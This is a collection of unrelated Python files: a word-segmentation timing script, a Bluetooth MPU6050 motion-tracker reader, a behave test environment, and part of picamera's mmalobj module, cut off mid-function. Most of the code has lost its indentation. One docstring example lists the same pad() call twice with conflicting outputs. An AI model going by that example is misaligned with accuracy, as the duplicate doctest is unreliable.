f.write("\n".join(result))
times.append(time.time())
print("total_time:\t{:.3f}".format(times[-1] - times[0]))
if verbose:
time_strs = [
"load_model",
"read_file",
"start_proc",
"word_seg",
"join_proc",
"write_file",
]
if alt:
times = times[1:]
time_strs = time_strs[1:]
time_strs[2] = "load_modal & word_seg"
for key, value in zip(
time_strs,
[end - start for start, end in zip(times[:-1], times[1:])],
):
print("{}:\t{:.3f}".format(key, value))
def test(
input_file,
output_file,
model_name="default",
user_dict="default",
nthread=10,
verbose=False,
):
if nthread > 1:
_test_multi_proc(
input_file, output_file, nthread, model_name, user_dict, verbose
)
else:
_test_single_proc(
input_file, output_file, model_name, user_dict, verbose
)
|
motiontracker.py
|
"""Bluetooth motion tracker module.
Copyright 2017 Mark Mitterdorfer
Class to read from a Bluetooth MPU6050 device.
Obtain acceleration, angular velocity, angle and temperature
"""
import threading
import struct
import bluetooth
class MotionTracker(object):
"""Class to track movement from MPU6050 Bluetooth device.
"""
def __init__(self, bd_addr, port=1):
"""Initialization for tracker object.
Args:
bd_addr (str) : Bluetooth address
port (int, optional) : Port, defaults to 1
Attributes:
bd_addr (str): Bluetooth address
port (int): Port
sock (bluetooth.bluez.BluetoothSocket) : Bluetooth socket object
acc_x (float) : acceleration in X
acc_y (float) : acceleration in Y
acc_z (float) : acceleration in Z
angv_x (float) : angular velocity in X
angv_y (float) : angular velocity in Y
angv_z (float) : angular velocity in Z
ang_x (float) : angle degrees in X
ang_y (float) : angle degrees in Y
ang_z (float) : angle degrees in Z
temperature (float) : temperature in degrees celsius
__thread_read_device_data (threading.Thread) : Read input thread
"""
self.bd_addr = bd_addr
self.port = port
self.sock = bluetooth.BluetoothSocket(bluetooth.RFCOMM)
self.sock.connect((self.bd_addr, self.port))
self.acc_x = 0.0
self.acc_y = 0.0
self.acc_z = 0.0
self.angv_x = 0.0
self.angv_y = 0.0
self.angv_z = 0.0
self.ang_x = 0.0
self.ang_y = 0.0
self.ang_z = 0.0
self.temperature = 0.0
self.__thread_read_device_data = None
def start_read_data(self):
"""Start reading from device. Wait for a second or two before
reading class attributes to allow values to 'settle' in.
Non blocking I/O performed via a private read thread.
"""
self.__thread_read_device_data = threading.Thread(target=self.__read_device_data)
self.__thread_read_device_data.is_running = True
self.__thread_read_device_data.start()
def stop_read_data(self):
"""Stop reading from device. Join back to main thread and
close the socket.
"""
self.__thread_read_device_data.is_running = False
self.__thread_read_device_data.join()
self.sock.close()
def __read_device_data(self):
"""Private method to read device data in 9 byte blocks.
"""
while self.__thread_read_device_data.is_running:
data_block = self.sock.recv(1)
if data_block == b'\x55':
data_block_type = self.sock.recv(1)
# Acceleration
if data_block_type == b'\x51':
# Read 9 byte block
ax_l = self.sock.recv(1)
ax_h = self.sock.recv(1)
ay_l = self.sock.recv(1)
ay_h = self.sock.recv(1)
az_l = self.sock.recv(1)
az_h = self.sock.recv(1)
t_l = self.sock.recv(1)
t_h = self.sock.recv(1)
self.sock.recv(1) # Check sum, ignore
self.acc_x = struct.unpack("<h", ax_l + ax_h)[0] / 32768.0 * 16.0
self.acc_y = struct.unpack("<h", ay_l + ay_h)[0] / 32768.0 * 16.0
self.acc_z = struct.unpack("<h", az_l + az_h)[0] / 32768.0 * 16.0
self.temperature = struct.unpack("<h", t_l + t_h)[0] / 340.0 + 36.25
# Angular velocity
elif data_block_type == b'\x52':
# Read 9 byte block
wx_l = self.sock.recv(1)
wx_h = self.sock.recv(1)
wy_l = self.sock.recv(1)
wy_h = self.sock.recv(1)
wz_l = self.sock.recv(1)
wz_h = self.sock.recv(1)
t_l = self.sock.recv(1)
t_h = self.sock.recv(1)
self.sock.recv(1) # Check sum, ignore
self.angv_x = struct.unpack("<h", wx_l + wx_h)[0] / 32768.0 * 2000.0
self.angv_y = struct.unpack("<h", wy_l + wy_h)[0] / 32768.0 * 2000.0
self.angv_z = struct.unpack("<h", wz_l + wz_h)[0] / 32768.0 * 2000.0
self.temperature = struct.unpack("<h", t_l + t_h)[0] / 340.0 + 36.25
# Angle
elif data_block_type == b'\x53':
# Read 9 byte block
roll_l = self.sock.recv(1)
roll_h = self.sock.recv(1)
pitch_l = self.sock.recv(1)
pitch_h = self.sock.recv(1)
yaw_l = self.sock.recv(1)
yaw_h = self.sock.recv(1)
t_l = self.sock.recv(1)
t_h = self.sock.recv(1)
self.sock.recv(1) # Check sum, ignore
self.ang_x = struct.unpack("<h", roll_l + roll_h)[0] / 32768.0 * 180.0
self.ang_y = struct.unpack("<h", pitch_l + pitch_h)[0] / 32768.0 * 180.0
self.ang_z = struct.unpack("<h", yaw_l + yaw_h)[0] / 32768.0 * 180.0
self.temperature = struct.unpack("<h", t_l + t_h)[0] / 340.0 + 36.25
def main():
    """Test driver stub.
    """
    # construct outside the try block so a failed connection doesn't leave
    # 'session' unbound in the KeyboardInterrupt handler
    session = MotionTracker(bd_addr="20:16:09:21:48:81")
    session.start_read_data()
    try:
        while True:
            print("ang_x:", session.ang_x, "ang_y:", session.ang_y, "ang_z:", session.ang_z)
    except KeyboardInterrupt:
        session.stop_read_data()
if __name__ == "__main__":
main()
|
environment.py
|
import sys
from threading import Thread
from ipdb import post_mortem
from app.app import app
from bdd_tests.modules.thread_bottle import MyServer
def begin(server):
app.run(server=server)
def before_all(context):
sys.dont_write_bytecode = True
context.base_url = 'http://127.0.0.1:8080'
context.server = MyServer(host="localhost", port=8080)
Thread(target=begin, args=(context.server,)).start()
def after_step(context, step):
if step.status == 'failed':
post_mortem(step.exc_traceback)
def after_all(context):
context.server.shutdown()
|
mmalobj.py
|
# vim: set et sw=4 sts=4 fileencoding=utf-8:
#
# Python header conversion
# Copyright (c) 2013-2017 Dave Jones <dave@waveform.org.uk>
#
# Original headers
# Copyright (c) 2012, Broadcom Europe Ltd
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the copyright holder nor the
# names of its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
from __future__ import (
unicode_literals,
print_function,
division,
absolute_import,
)
# Make Py2's str equivalent to Py3's
str = type('')
import io
import ctypes as ct
import warnings
import weakref
from threading import Thread, Event
from collections import namedtuple
from fractions import Fraction
from itertools import cycle
from functools import reduce
from operator import mul
from . import bcm_host, mmal
from .streams import BufferIO
from .exc import (
mmal_check,
PiCameraValueError,
PiCameraRuntimeError,
PiCameraMMALError,
PiCameraPortDisabled,
PiCameraDeprecated,
)
# Old firmwares confuse the RGB24 and BGR24 encodings. This flag tracks whether
# the order needs fixing (it is set during MMALCamera.__init__).
FIX_RGB_BGR_ORDER = None
# Mapping of parameters to the C-structure they expect / return. If a parameter
# does not appear in this mapping, it cannot be queried / set with the
# MMALControlPort.params attribute.
PARAM_TYPES = {
mmal.MMAL_PARAMETER_ALGORITHM_CONTROL: mmal.MMAL_PARAMETER_ALGORITHM_CONTROL_T,
mmal.MMAL_PARAMETER_ANNOTATE: None, # adjusted by MMALCamera.annotate_rev
mmal.MMAL_PARAMETER_ANTISHAKE: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_AUDIO_LATENCY_TARGET: mmal.MMAL_PARAMETER_AUDIO_LATENCY_TARGET_T,
mmal.MMAL_PARAMETER_AWB_MODE: mmal.MMAL_PARAMETER_AWBMODE_T,
mmal.MMAL_PARAMETER_BRIGHTNESS: mmal.MMAL_PARAMETER_RATIONAL_T,
mmal.MMAL_PARAMETER_BUFFER_FLAG_FILTER: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_BUFFER_REQUIREMENTS: mmal.MMAL_PARAMETER_BUFFER_REQUIREMENTS_T,
mmal.MMAL_PARAMETER_CAMERA_BURST_CAPTURE: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_CAMERA_CLOCKING_MODE: mmal.MMAL_PARAMETER_CAMERA_CLOCKING_MODE_T,
mmal.MMAL_PARAMETER_CAMERA_CONFIG: mmal.MMAL_PARAMETER_CAMERA_CONFIG_T,
mmal.MMAL_PARAMETER_CAMERA_CUSTOM_SENSOR_CONFIG: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_CAMERA_INFO: None, # adjusted by MMALCameraInfo.info_rev
mmal.MMAL_PARAMETER_CAMERA_INTERFACE: mmal.MMAL_PARAMETER_CAMERA_INTERFACE_T,
mmal.MMAL_PARAMETER_CAMERA_ISP_BLOCK_OVERRIDE: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_CAMERA_MIN_ISO: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_CAMERA_NUM: mmal.MMAL_PARAMETER_INT32_T,
mmal.MMAL_PARAMETER_CAMERA_RX_CONFIG: mmal.MMAL_PARAMETER_CAMERA_RX_CONFIG_T,
mmal.MMAL_PARAMETER_CAMERA_RX_TIMING: mmal.MMAL_PARAMETER_CAMERA_RX_TIMING_T,
mmal.MMAL_PARAMETER_CAMERA_SETTINGS: mmal.MMAL_PARAMETER_CAMERA_SETTINGS_T,
mmal.MMAL_PARAMETER_CAMERA_USE_CASE: mmal.MMAL_PARAMETER_CAMERA_USE_CASE_T,
mmal.MMAL_PARAMETER_CAPTURE_EXPOSURE_COMP: mmal.MMAL_PARAMETER_INT32_T,
mmal.MMAL_PARAMETER_CAPTURE: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_CAPTURE_MODE: mmal.MMAL_PARAMETER_CAPTUREMODE_T,
mmal.MMAL_PARAMETER_CAPTURE_STATS_PASS: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_CAPTURE_STATUS: mmal.MMAL_PARAMETER_CAPTURE_STATUS_T,
mmal.MMAL_PARAMETER_CHANGE_EVENT_REQUEST: mmal.MMAL_PARAMETER_CHANGE_EVENT_REQUEST_T,
mmal.MMAL_PARAMETER_CLOCK_ACTIVE: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_CLOCK_DISCONT_THRESHOLD: mmal.MMAL_PARAMETER_CLOCK_DISCONT_THRESHOLD_T,
mmal.MMAL_PARAMETER_CLOCK_ENABLE_BUFFER_INFO: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_CLOCK_FRAME_RATE: mmal.MMAL_PARAMETER_RATIONAL_T,
mmal.MMAL_PARAMETER_CLOCK_LATENCY: mmal.MMAL_PARAMETER_CLOCK_LATENCY_T,
mmal.MMAL_PARAMETER_CLOCK_REQUEST_THRESHOLD: mmal.MMAL_PARAMETER_CLOCK_REQUEST_THRESHOLD_T,
mmal.MMAL_PARAMETER_CLOCK_SCALE: mmal.MMAL_PARAMETER_RATIONAL_T,
mmal.MMAL_PARAMETER_CLOCK_TIME: mmal.MMAL_PARAMETER_INT64_T,
mmal.MMAL_PARAMETER_CLOCK_UPDATE_THRESHOLD: mmal.MMAL_PARAMETER_CLOCK_UPDATE_THRESHOLD_T,
mmal.MMAL_PARAMETER_COLOUR_EFFECT: mmal.MMAL_PARAMETER_COLOURFX_T,
mmal.MMAL_PARAMETER_CONTRAST: mmal.MMAL_PARAMETER_RATIONAL_T,
mmal.MMAL_PARAMETER_CORE_STATISTICS: mmal.MMAL_PARAMETER_CORE_STATISTICS_T,
mmal.MMAL_PARAMETER_CUSTOM_AWB_GAINS: mmal.MMAL_PARAMETER_AWB_GAINS_T,
mmal.MMAL_PARAMETER_DISPLAYREGION: mmal.MMAL_DISPLAYREGION_T,
mmal.MMAL_PARAMETER_DPF_CONFIG: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_DYNAMIC_RANGE_COMPRESSION: mmal.MMAL_PARAMETER_DRC_T,
mmal.MMAL_PARAMETER_ENABLE_RAW_CAPTURE: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_EXIF_DISABLE: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_EXIF: mmal.MMAL_PARAMETER_EXIF_T,
mmal.MMAL_PARAMETER_EXP_METERING_MODE: mmal.MMAL_PARAMETER_EXPOSUREMETERINGMODE_T,
mmal.MMAL_PARAMETER_EXPOSURE_COMP: mmal.MMAL_PARAMETER_INT32_T,
mmal.MMAL_PARAMETER_EXPOSURE_MODE: mmal.MMAL_PARAMETER_EXPOSUREMODE_T,
mmal.MMAL_PARAMETER_EXTRA_BUFFERS: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_FIELD_OF_VIEW: mmal.MMAL_PARAMETER_FIELD_OF_VIEW_T,
mmal.MMAL_PARAMETER_FLASH: mmal.MMAL_PARAMETER_FLASH_T,
mmal.MMAL_PARAMETER_FLASH_REQUIRED: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_FLASH_SELECT: mmal.MMAL_PARAMETER_FLASH_SELECT_T,
mmal.MMAL_PARAMETER_FLICKER_AVOID: mmal.MMAL_PARAMETER_FLICKERAVOID_T,
mmal.MMAL_PARAMETER_FOCUS: mmal.MMAL_PARAMETER_FOCUS_T,
mmal.MMAL_PARAMETER_FOCUS_REGIONS: mmal.MMAL_PARAMETER_FOCUS_REGIONS_T,
mmal.MMAL_PARAMETER_FOCUS_STATUS: mmal.MMAL_PARAMETER_FOCUS_STATUS_T,
mmal.MMAL_PARAMETER_FPS_RANGE: mmal.MMAL_PARAMETER_FPS_RANGE_T,
mmal.MMAL_PARAMETER_FRAME_RATE: mmal.MMAL_PARAMETER_RATIONAL_T, # actually mmal.MMAL_PARAMETER_FRAME_RATE_T but this only contains a rational anyway...
mmal.MMAL_PARAMETER_IMAGE_EFFECT: mmal.MMAL_PARAMETER_IMAGEFX_T,
mmal.MMAL_PARAMETER_IMAGE_EFFECT_PARAMETERS: mmal.MMAL_PARAMETER_IMAGEFX_PARAMETERS_T,
mmal.MMAL_PARAMETER_INPUT_CROP: mmal.MMAL_PARAMETER_INPUT_CROP_T,
mmal.MMAL_PARAMETER_INTRAPERIOD: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_ISO: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_JPEG_ATTACH_LOG: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_JPEG_Q_FACTOR: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_JPEG_RESTART_INTERVAL: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_LOCKSTEP_ENABLE: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_LOGGING: mmal.MMAL_PARAMETER_LOGGING_T,
mmal.MMAL_PARAMETER_MB_ROWS_PER_SLICE: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_MEM_USAGE: mmal.MMAL_PARAMETER_MEM_USAGE_T,
mmal.MMAL_PARAMETER_MINIMISE_FRAGMENTATION: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_MIRROR: mmal.MMAL_PARAMETER_UINT32_T, # actually mmal.MMAL_PARAMETER_MIRROR_T but this just contains a uint32
mmal.MMAL_PARAMETER_NALUNITFORMAT: mmal.MMAL_PARAMETER_VIDEO_NALUNITFORMAT_T,
mmal.MMAL_PARAMETER_NO_IMAGE_PADDING: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_POWERMON_ENABLE: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_PRIVACY_INDICATOR: mmal.MMAL_PARAMETER_PRIVACY_INDICATOR_T,
mmal.MMAL_PARAMETER_PROFILE: mmal.MMAL_PARAMETER_VIDEO_PROFILE_T,
mmal.MMAL_PARAMETER_RATECONTROL: mmal.MMAL_PARAMETER_VIDEO_RATECONTROL_T,
mmal.MMAL_PARAMETER_REDEYE: mmal.MMAL_PARAMETER_REDEYE_T,
mmal.MMAL_PARAMETER_ROTATION: mmal.MMAL_PARAMETER_INT32_T,
mmal.MMAL_PARAMETER_SATURATION: mmal.MMAL_PARAMETER_RATIONAL_T,
mmal.MMAL_PARAMETER_SEEK: mmal.MMAL_PARAMETER_SEEK_T,
mmal.MMAL_PARAMETER_SENSOR_INFORMATION: mmal.MMAL_PARAMETER_SENSOR_INFORMATION_T,
mmal.MMAL_PARAMETER_SHARPNESS: mmal.MMAL_PARAMETER_RATIONAL_T,
mmal.MMAL_PARAMETER_SHUTTER_SPEED: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_STATISTICS: mmal.MMAL_PARAMETER_STATISTICS_T,
mmal.MMAL_PARAMETER_STEREOSCOPIC_MODE: mmal.MMAL_PARAMETER_STEREOSCOPIC_MODE_T,
mmal.MMAL_PARAMETER_STILLS_DENOISE: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_SUPPORTED_ENCODINGS: mmal.MMAL_PARAMETER_ENCODING_T,
mmal.MMAL_PARAMETER_SUPPORTED_PROFILES: mmal.MMAL_PARAMETER_VIDEO_PROFILE_T,
mmal.MMAL_PARAMETER_SW_SATURATION_DISABLE: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_SW_SHARPEN_DISABLE: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_SYSTEM_TIME: mmal.MMAL_PARAMETER_UINT64_T,
mmal.MMAL_PARAMETER_THUMBNAIL_CONFIGURATION: mmal.MMAL_PARAMETER_THUMBNAIL_CONFIG_T,
mmal.MMAL_PARAMETER_URI: mmal.MMAL_PARAMETER_URI_T,
mmal.MMAL_PARAMETER_USE_STC: mmal.MMAL_PARAMETER_CAMERA_STC_MODE_T,
mmal.MMAL_PARAMETER_VIDEO_ALIGN_HORIZ: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_VIDEO_ALIGN_VERT: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_VIDEO_BIT_RATE: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_VIDEO_DENOISE: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_VIDEO_DROPPABLE_PFRAMES: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_VIDEO_EEDE_ENABLE: mmal.MMAL_PARAMETER_VIDEO_EEDE_ENABLE_T,
mmal.MMAL_PARAMETER_VIDEO_EEDE_LOSSRATE: mmal.MMAL_PARAMETER_VIDEO_EEDE_LOSSRATE_T,
mmal.MMAL_PARAMETER_VIDEO_ENCODE_FRAME_LIMIT_BITS: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_VIDEO_ENCODE_INITIAL_QUANT: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_VIDEO_ENCODE_INLINE_HEADER: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_VIDEO_ENCODE_INLINE_VECTORS: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_VIDEO_ENCODE_MAX_QUANT: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_VIDEO_ENCODE_MIN_QUANT: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_VIDEO_ENCODE_PEAK_RATE: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_VIDEO_ENCODE_QP_P: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_VIDEO_ENCODE_RC_MODEL: mmal.MMAL_PARAMETER_VIDEO_ENCODE_RC_MODEL_T,
mmal.MMAL_PARAMETER_VIDEO_ENCODE_RC_SLICE_DQUANT: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_VIDEO_ENCODE_SEI_ENABLE: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_VIDEO_ENCODE_SPS_TIMING: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_VIDEO_FRAME_RATE: mmal.MMAL_PARAMETER_RATIONAL_T, # actually mmal.MMAL_PARAMETER_FRAME_RATE_T but this only contains a rational anyway...
mmal.MMAL_PARAMETER_VIDEO_IMMUTABLE_INPUT: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_VIDEO_INTERLACE_TYPE: mmal.MMAL_PARAMETER_VIDEO_INTERLACE_TYPE_T,
mmal.MMAL_PARAMETER_VIDEO_INTERPOLATE_TIMESTAMPS: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_VIDEO_INTRA_REFRESH: mmal.MMAL_PARAMETER_VIDEO_INTRA_REFRESH_T,
mmal.MMAL_PARAMETER_VIDEO_LEVEL_EXTENSION: mmal.MMAL_PARAMETER_VIDEO_LEVEL_EXTENSION_T,
mmal.MMAL_PARAMETER_VIDEO_MAX_NUM_CALLBACKS: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_VIDEO_RENDER_STATS: mmal.MMAL_PARAMETER_VIDEO_RENDER_STATS_T,
mmal.MMAL_PARAMETER_VIDEO_REQUEST_I_FRAME: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_VIDEO_STABILISATION: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_ZERO_COPY: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_ZERO_SHUTTER_LAG: mmal.MMAL_PARAMETER_ZEROSHUTTERLAG_T,
mmal.MMAL_PARAMETER_ZOOM: mmal.MMAL_PARAMETER_SCALEFACTOR_T,
}
class PiCameraFraction(Fraction):
"""
Extends :class:`~fractions.Fraction` to act as a (numerator, denominator)
tuple when required.
"""
def __len__(self):
warnings.warn(
PiCameraDeprecated(
'Accessing framerate as a tuple is deprecated; this value is '
'now a Fraction, so you can query the numerator and '
'denominator properties directly, convert to an int or float, '
'or perform arithmetic operations and comparisons directly'))
return 2
def __getitem__(self, index):
warnings.warn(
PiCameraDeprecated(
'Accessing framerate as a tuple is deprecated; this value is '
'now a Fraction, so you can query the numerator and '
'denominator properties directly, convert to an int or float, '
'or perform arithmetic operations and comparisons directly'))
if index == 0:
return self.numerator
elif index == 1:
return self.denominator
else:
raise IndexError('invalid index %d' % index)
def __contains__(self, value):
return value in (self.numerator, self.denominator)
class PiResolution(namedtuple('PiResolution', ('width', 'height'))):
"""
A :func:`~collections.namedtuple` derivative which represents a resolution
with a :attr:`width` and :attr:`height`.
.. attribute:: width
The width of the resolution in pixels
.. attribute:: height
The height of the resolution in pixels
.. versionadded:: 1.11
"""
__slots__ = () # workaround python issue #24931
def pad(self, width=32, height=16):
"""
Returns the resolution padded up to the nearest multiple of *width*
and *height* which default to 32 and 16 respectively (the camera's
native block size for most operations). For example:
.. code-block:: pycon
>>> PiResolution(1920, 1080).pad()
PiResolution(width=1920, height=1088)
>>> PiResolution(100, 100).pad(16, 16)
PiResolution(width=128, height=112)
>>> PiResolution(100, 100).pad(16, 16)
PiResolution(width=112, height=112)
"""
return PiResolution(
width=((self.width + (width - 1)) // width) * width,
height=((self.height + (height - 1)) // height) * height,
)
def transpose(self):
"""
Returns the resolution with the width and height transposed. For
example:
.. code-block:: pycon
>>> PiResolution(1920, 1080).transpose()
PiResolution(width=1080, height=1920)
"""
return PiResolution(self.height, self.width)
def __str__(self):
return '%dx%d' % (self.width, self.height)
class PiFramerateRange(namedtuple('PiFramerateRange', ('low', 'high'))):
"""
This class is a :func:`~collections.namedtuple` derivative used to store
the low and high limits of a range of framerates. It is recommended that
you access the information stored by this class by attribute rather than
position (for example: ``camera.framerate_range.low`` rather than
``camera.framerate_range[0]``).
.. attribute:: low
The lowest framerate that the camera is permitted to use (inclusive).
When the :attr:`~picamera.PiCamera.framerate_range` attribute is
queried, this value will always be returned as a
:class:`~fractions.Fraction`.
.. attribute:: high
The highest framerate that the camera is permitted to use (inclusive).
When the :attr:`~picamera.PiCamera.framerate_range` attribute is
queried, this value will always be returned as a
:class:`~fractions.Fraction`.
.. versionadded:: 1.13
"""
__slots__ = () # workaround python issue #24931
def __new__(cls, low, high):
return super(PiFramerateRange, cls).__new__(cls, to_fraction(low),
to_fraction(high))
def __str__(self):
return '%s..%s' % (self.low, self.high)
class PiSensorMode(namedtuple('PiSensorMode', ('resolution', 'framerates',
'video', 'still', 'full_fov'))):
"""
This class is a :func:`~collections.namedtuple` derivative used to store
the attributes describing a camera sensor mode.
.. attribute:: resolution
A :class:`PiResolution` specifying the size of frames output by the
camera in this mode.
.. attribute:: framerates
A :class:`PiFramerateRange` specifying the minimum and maximum
framerates supported by this sensor mode. Typically the low value is
exclusive and high value inclusive.
.. attribute:: video
A :class:`bool` indicating whether or not the mode is capable of
recording video. Currently this is always ``True``.
.. attribute:: still
A :class:`bool` indicating whether the mode can be used for still
captures (cases where a capture method is called with
``use_video_port`` set to ``False``).
.. attribute:: full_fov
A :class:`bool` indicating whether the full width of the sensor
area is used to capture frames. This can be ``True`` even when the
resolution is less than the camera's maximum resolution due to binning
and skipping. See :ref:`camera_modes` for a diagram of the available
fields of view.
"""
__slots__ = () # workaround python issue #24931
def __new__(cls, resolution, framerates, video=True, still=False,
full_fov=True):
return super(PiSensorMode, cls).__new__(
cls,
resolution
if isinstance(resolution, PiResolution) else
to_resolution(resolution),
framerates
if isinstance(framerates, PiFramerateRange) else
PiFramerateRange(*framerates),
video, still, full_fov)
def open_stream(stream, output=True, buffering=65536):
"""
This is the core of picamera's IO-semantics. It returns a tuple of a
file-like object and a bool indicating whether the stream requires closing
once the caller is finished with it.
* If *stream* is a string, it is opened as a file object (with mode 'wb' if
      *output* is ``True``, and the specified amount of *buffering*). In this
case the function returns ``(stream, True)``.
* If *stream* is a stream with a ``write`` method, it is returned as
``(stream, False)``.
* Otherwise *stream* is assumed to be a writeable buffer and is wrapped
with :class:`BufferIO`. The function returns ``(stream, True)``.
"""
if isinstance(stream, bytes):
stream = stream.decode('ascii')
opened = isinstance(stream, str)
if opened:
stream = io.open(stream, 'wb' if output else 'rb', buffering)
else:
try:
if output:
stream.write
else:
stream.read
except AttributeError:
# Assume the stream is actually a buffer
opened = True
stream = BufferIO(stream)
if output and not stream.writable:
raise IOError('writeable buffer required for output')
return (stream, opened)
def close_stream(stream, opened):
"""
If *opened* is ``True``, then the ``close`` method of *stream* will be
called. Otherwise, the function will attempt to call the ``flush`` method
on *stream* (if one exists). This function essentially takes the output
of :func:`open_stream` and finalizes the result.
"""
if opened:
stream.close()
else:
try:
stream.flush()
except AttributeError:
pass
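# Typical pairing of open_stream and close_stream (the filename and data are
# placeholders):
#
#     stream, opened = open_stream('output.h264')
#     try:
#         stream.write(data)
#     finally:
#         close_stream(stream, opened)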
def to_resolution(value):
"""
Converts *value* which may be a (width, height) tuple or a string
containing a representation of a resolution (e.g. "1024x768" or "1080p") to
a (width, height) tuple.
"""
if isinstance(value, bytes):
value = value.decode('utf-8')
if isinstance(value, str):
try:
# A selection from https://en.wikipedia.org/wiki/Graphics_display_resolution
# Feel free to suggest additions
w, h = {
'VGA': (640, 480),
'SVGA': (800, 600),
'XGA': (1024, 768),
'SXGA': (1280, 1024),
'UXGA': (1600, 1200),
'HD': (1280, 720),
'FHD': (1920, 1080),
'1080P': (1920, 1080),
'720P': (1280, 720),
}[value.strip().upper()]
except KeyError:
w, h = (int(i.strip()) for i in value.upper().split('X', 1))
else:
try:
w, h = value
except (TypeError, ValueError):
raise PiCameraValueError("Invalid resolution tuple: %r" % value)
return PiResolution(w, h)
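# Illustrative conversions (see the docstring above for the accepted forms):
#
#     to_resolution('720p')     # -> PiResolution(width=1280, height=720)
#     to_resolution('640x480')  # -> PiResolution(width=640, height=480)
#     to_resolution((64, 64))   # -> PiResolution(width=64, height=64)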
def to_fraction(value, den_limit=65536):
"""
Converts *value*, which can be any numeric type, an MMAL_RATIONAL_T, or a
(numerator, denominator) tuple to a :class:`~fractions.Fraction` limiting
the denominator to the range 0 < n <= *den_limit* (which defaults to
65536).
"""
try:
# int, long, or fraction
n, d = value.numerator, value.denominator
except AttributeError:
try:
# float
n, d = value.as_integer_ratio()
